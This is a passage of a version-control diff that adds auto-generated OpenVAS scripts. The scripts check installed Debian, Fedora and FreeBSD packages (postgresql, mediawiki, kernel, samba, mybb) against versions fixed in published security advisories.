ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-doc-7.4", ver:"7.4.26-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-contrib-7.4", ver:"7.4.26-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-plperl-7.4", ver:"7.4.26-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpq4", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-8.1", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpq-dev", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-plpython-8.1", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libecpg5", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libecpg-compat2", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-plperl-8.1", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-contrib-8.1", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libecpg-dev", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-plpython-7.4", ver:"7.4.26-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpgtypes2", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-pltcl-7.4", ver:"7.4.26-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-server-dev-8.1", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-client-7.4", ver:"7.4.26-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-7.4", ver:"7.4.26-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-pltcl-8.1", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-client-8.1", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-doc-8.3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-contrib", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-client", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-doc", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-pltcl-8.3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpq-dev", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-contrib-8.3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libecpg-compat3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpq5", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpgtypes3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libecpg6", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-client-8.3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-server-dev-8.3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-plperl-8.3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libecpg-dev", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-plpython-8.3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-8.3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/deb_1901_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/deb_1901_1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/deb_1901_1.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,115 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory DSA 1901-1 (mediawiki1.7) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65007); + script_cve_id("CVE-2008-5249", "CVE-2008-5250", "CVE-2008-5252", "CVE-2009-0737"); + script_version ("$"); + script_name("Debian Security Advisory DSA 1901-1 (mediawiki1.7)"); + + desc = " +The remote host is missing an update to mediawiki1.7 +announced via advisory DSA 1901-1. + + +Several vulnerabilities have been discovered in mediawiki1.7, a website engine +for collaborative work. The Common Vulnerabilities and Exposures project +identifies the following problems: + +CVE-2008-5249 + +David Remahl discovered that mediawiki1.7 is prone to a cross-site scripting attack. + +CVE-2008-5250 + +David Remahl discovered that mediawiki1.7, when Internet Explorer is used and +uploads are enabled, or an SVG scripting browser is used and SVG uploads are +enabled, allows remote authenticated users to inject arbitrary web script or +HTML by editing a wiki page. + +CVE-2008-5252 + +David Remahl discovered that mediawiki1.7 is prone to a cross-site request +forgery vulnerability in the Special:Import feature. + +CVE-2009-0737 + +It was discovered that mediawiki1.7 is prone to a cross-site scripting attack in +the web-based installer. + + +For the oldstable distribution (etch), these problems have been fixed in version +1.7.1-9etch1 for mediawiki1.7, and mediawiki is not affected (it is a +metapackage for mediawiki1.7). + +The stable (lenny) distribution does not include mediawiki1.7, and these +problems have been fixed in version 1:1.12.0-2lenny3 for mediawiki which was +already included in the lenny release. + +The unstable (sid) and testing (squeeze) distributions do not +include mediawiki1.7, and these problems have been fixed in version 1:1.14.0-1 +for mediawiki. + + +We recommend that you upgrade your mediawiki1.7 packages. + +Solution: +https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201901-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Debian Security Advisory DSA 1901-1 (mediawiki1.7)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Debian Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"mediawiki1.7", ver:"1.7.1-9etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"mediawiki1.7-math", ver:"1.7.1-9etch1", rls:"DEB4.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/fcore_2009_10165.nasl =================================================================== --- trunk/openvas-plugins/scripts/fcore_2009_10165.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/fcore_2009_10165.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,181 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory FEDORA-2009-10165 (kernel) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64999); + script_cve_id("CVE-2009-2903", "CVE-2009-3290", "CVE-2009-2847", "CVE-2009-2692", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-1895", "CVE-2009-1897", "CVE-2009-0065", "CVE-2008-5079", "CVE-2009-3001", "CVE-2009-3002"); + script_version ("$"); + script_name("Fedora Core 10 FEDORA-2009-10165 (kernel)"); + + desc = " +The remote host is missing an update to kernel +announced via advisory FEDORA-2009-10165. + +Update Information: + +Update to kernel 2.6.27.35: +http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.31 +http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.32 +http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.33 +http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.34 +http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.35 + +ChangeLog: + +* Sat Sep 26 2009 Chuck Ebbert 2.6.27.35-170.2.94 +- Backport appletalk: Fix skb leak when ipddp interface is not loaded +(fixes CVE-2009-2903) +* Sat Sep 26 2009 Chuck Ebbert 2.6.27.35-170.2.93 +- Backport KVM: x86: Disallow hypercalls for guest callers in rings > 0 +(fixes CVE-2009-3290) +* Thu Sep 24 2009 Chuck Ebbert 2.6.27.35-170.2.92 +- Linux 2.6.27.35 +- Drop merged patches: +linux-2.6-nfsd-report-short-writes-fix.patch +linux-2.6-nfsd-report-short-writes.patch +* Tue Sep 15 2009 Chuck Ebbert 2.6.27.34-170.2.91 +- Linux 2.6.27.34 +- Drop merged patch: linux-2.6-slub-fix-destroy-by-rcu.patch +* Wed Sep 9 2009 Chuck Ebbert 2.6.27.32-170.2.90 +- 2.6.27.32 final +- Drop linux-2.6-ocfs2-handle-len-0.patch, added after .32-rc1 +* Mon Sep 7 2009 Chuck Ebbert 2.6.27.32-170.2.89.rc1 +- Backport fix for b43 on ppc64 to 2.6.27 (#514787) +* Sun Sep 6 2009 Chuck Ebbert 2.6.27.32-170.2.88.rc1 +- Add patches requested for the next stable release: +linux-2.6-slub-fix-destroy-by-rcu.patch (fixes bug in 2.6.27.29) +linux-2.6-ocfs2-handle-len-0.patch (fixes bug in 2.6.27.32-rc1) +* Fri Sep 4 2009 Chuck Ebbert 2.6.27.32-170.2.87.rc1 +- Copy fix for NFS short write reporting from F-10 2.6.29 kernel (#493500) + +References: + +[ 1 ] Bug #515392 - CVE-2009-2847 kernel: information leak in sigaltstack +https://bugzilla.redhat.com/show_bug.cgi?id=515392 +[ 2 ] Bug #524124 - CVE-2009-3290 kernel: KVM: x86: Disallow hypercalls for guest callers in rings > 0 +https://bugzilla.redhat.com/show_bug.cgi?id=524124 +[ 3 ] Bug #522331 - CVE-2009-2903 kernel: appletalk: denial of service when handling IP tunnelled over DDP datagrams +https://bugzilla.redhat.com/show_bug.cgi?id=522331 +[ 4 ] Bug #519305 - CVE-2009-3001, CVE-2009-3002 kernel: numerous getname() infoleaks +https://bugzilla.redhat.com/show_bug.cgi?id=519305 + +Solution: Apply the appropriate updates. + +This update can be installed with the yum update program. Use +su -c 'yum update kernel' at the command line. +For more information, refer to Managing Software with yum, +available at http://docs.fedoraproject.org/yum/. + +https://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10165 + +Risk factor : High"; + + script_description(desc); + + script_summary("Fedora Core 10 FEDORA-2009-10165 (kernel)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Fedora Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"kernel-headers", rpm:"kernel-headers~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel", rpm:"kernel~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-devel", rpm:"kernel-devel~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debuginfo", rpm:"kernel-debuginfo~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debuginfo-common", rpm:"kernel-debuginfo-common~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAE", rpm:"kernel-PAE~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAE-devel", rpm:"kernel-PAE-devel~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAEdebug", rpm:"kernel-PAEdebug~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAEdebug-devel", rpm:"kernel-PAEdebug-devel~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debug", rpm:"kernel-debug~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debug-devel", rpm:"kernel-debug-devel~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAE-debuginfo", rpm:"kernel-PAE-debuginfo~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAEdebug-debuginfo", rpm:"kernel-PAEdebug-debuginfo~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debug-debuginfo", rpm:"kernel-debug-debuginfo~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-doc", rpm:"kernel-doc~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-firmware", rpm:"kernel-firmware~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-bootwrapper", rpm:"kernel-bootwrapper~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-smp", rpm:"kernel-smp~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-smp-devel", rpm:"kernel-smp-devel~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-smp-debuginfo", rpm:"kernel-smp-debuginfo~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/fcore_2009_10172.nasl =================================================================== --- trunk/openvas-plugins/scripts/fcore_2009_10172.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/fcore_2009_10172.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,140 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory FEDORA-2009-10172 (samba) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65001); + script_cve_id("CVE-2009-2813", "CVE-2009-2948", "CVE-2009-2906", "CVE-2009-0022", "CVE-2008-4314"); + script_version ("$"); + script_name("Fedora Core 10 FEDORA-2009-10172 (samba)"); + + desc = " +The remote host is missing an update to samba +announced via advisory FEDORA-2009-10172. + +Update Information: + +Security Release, fixes CVE-2009-2813, CVE-2009-2948 and CVE-2009-2906 + +ChangeLog: + +* Thu Oct 1 2009 Guenther Deschner - 3.2.15-0.36 +- Update to 3.2.15 +- Security Release, fixes CVE-2009-2813, CVE-2009-2948 and CVE-2009-2906 + +References: + +[ 1 ] Bug #523752 - CVE-2009-2813 Samba: Share restriction bypass via home-less directory user account(s) +https://bugzilla.redhat.com/show_bug.cgi?id=523752 +[ 2 ] Bug #526074 - CVE-2009-2948 samba: information disclosure in suid mount.cifs +https://bugzilla.redhat.com/show_bug.cgi?id=526074 +[ 3 ] Bug #526645 - CVE-2009-2906 samba: infinite loop flaw in smbd on unexpected oplock break notification reply +https://bugzilla.redhat.com/show_bug.cgi?id=526645 + +Solution: Apply the appropriate updates. + +This update can be installed with the yum update program. Use +su -c 'yum update samba' at the command line. +For more information, refer to Managing Software with yum, +available at http://docs.fedoraproject.org/yum/. + +https://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10172 + +Risk factor : High"; + + script_description(desc); + + script_summary("Fedora Core 10 FEDORA-2009-10172 (samba)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Fedora Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"libsmbclient", rpm:"libsmbclient~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libsmbclient-devel", rpm:"libsmbclient-devel~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libtalloc", rpm:"libtalloc~1.2.0~36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libtalloc-devel", rpm:"libtalloc-devel~1.2.0~36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libtdb", rpm:"libtdb~1.1.1~36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libtdb-devel", rpm:"libtdb-devel~1.1.1~36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba", rpm:"samba~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-client", rpm:"samba-client~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-common", rpm:"samba-common~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-doc", rpm:"samba-doc~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-domainjoin-gui", rpm:"samba-domainjoin-gui~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-swat", rpm:"samba-swat~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-winbind", rpm:"samba-winbind~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-winbind-devel", rpm:"samba-winbind-devel~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"tdb-tools", rpm:"tdb-tools~1.1.1~36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-debuginfo", rpm:"samba-debuginfo~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/fcore_2009_10180.nasl =================================================================== --- trunk/openvas-plugins/scripts/fcore_2009_10180.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/fcore_2009_10180.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,127 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory FEDORA-2009-10180 (samba) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65000); + script_cve_id("CVE-2009-2813", "CVE-2009-2948", "CVE-2009-2906"); + script_version ("$"); + script_name("Fedora Core 11 FEDORA-2009-10180 (samba)"); + + desc = " +The remote host is missing an update to samba +announced via advisory FEDORA-2009-10180. + +Update Information: + +Security Release, fixes CVE-2009-2813, CVE-2009-2948 and CVE-2009-2906 + +ChangeLog: + +* Thu Oct 1 2009 Guenther Deschner - 3.4.2-0.42 +- Update to 3.4.2 +- Security Release, fixes CVE-2009-2813, CVE-2009-2948 and CVE-2009-2906 +* Wed Sep 9 2009 Guenther Deschner - 3.4.1.0-41 +- Update to 3.4.1 + +References: + +[ 1 ] Bug #523752 - CVE-2009-2813 Samba: Share restriction bypass via home-less directory user account(s) +https://bugzilla.redhat.com/show_bug.cgi?id=523752 +[ 2 ] Bug #526074 - CVE-2009-2948 samba: information disclosure in suid mount.cifs +https://bugzilla.redhat.com/show_bug.cgi?id=526074 +[ 3 ] Bug #526645 - CVE-2009-2906 samba: infinite loop flaw in smbd on unexpected oplock break notification reply +https://bugzilla.redhat.com/show_bug.cgi?id=526645 + +Solution: Apply the appropriate updates. + +This update can be installed with the yum update program. Use +su -c 'yum update samba' at the command line. +For more information, refer to Managing Software with yum, +available at http://docs.fedoraproject.org/yum/. + +https://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10180 + +Risk factor : High"; + + script_description(desc); + + script_summary("Fedora Core 11 FEDORA-2009-10180 (samba)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Fedora Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"libsmbclient", rpm:"libsmbclient~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libsmbclient-devel", rpm:"libsmbclient-devel~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba", rpm:"samba~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-client", rpm:"samba-client~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-common", rpm:"samba-common~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-doc", rpm:"samba-doc~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-domainjoin-gui", rpm:"samba-domainjoin-gui~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-swat", rpm:"samba-swat~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-winbind", rpm:"samba-winbind~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-winbind-devel", rpm:"samba-winbind-devel~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-debuginfo", rpm:"samba-debuginfo~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/freebsd_mybb.nasl =================================================================== --- trunk/openvas-plugins/scripts/freebsd_mybb.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/freebsd_mybb.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,82 @@ +# +#VID beb6f4a8-add5-11de-8b55-0030843d3802 +# OpenVAS Vulnerability Test +# $ +# Description: Auto generated from VID beb6f4a8-add5-11de-8b55-0030843d3802 +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisories, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65012); + script_bugtraq_id(36460); + script_version ("$"); + script_name("FreeBSD Ports: mybb"); + + desc = " +The remote host is missing an update to the system +as announced in the referenced advisory. + +The following package is affected: mybb + +Solution: +Update your system with the appropriate patches or +software upgrades. + +http://dev.mybboard.net/issues/464 +http://dev.mybboard.net/issues/418 +http://secunia.com/advisories/36803 +http://blog.mybboard.net/2009/09/21/mybb-1-4-9-released-security-update/ +http://www.vuxml.org/freebsd/beb6f4a8-add5-11de-8b55-0030843d3802.html + +Risk factor : High"; + + script_description(desc); + + script_summary("FreeBSD Ports: mybb"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("FreeBSD Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/freebsdrel"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-bsd.inc"); +vuln = 0; +bver = portver(pkg:"mybb"); +if(!isnull(bver) && revcomp(a:bver, b:"1.4.9")<0) { + security_note(0, data:"Package mybb version " + bver + " is installed which is known to be vulnerable."); + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/freebsdsa_devfs1.nasl =================================================================== --- trunk/openvas-plugins/scripts/freebsdsa_devfs1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/freebsdsa_devfs1.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,90 @@ +# +#ADV FreeBSD-SA-09:14.devfs.asc +# OpenVAS Vulnerability Test +# $ +# Description: Auto generated from ADV FreeBSD-SA-09:14.devfs.asc +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisories, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, 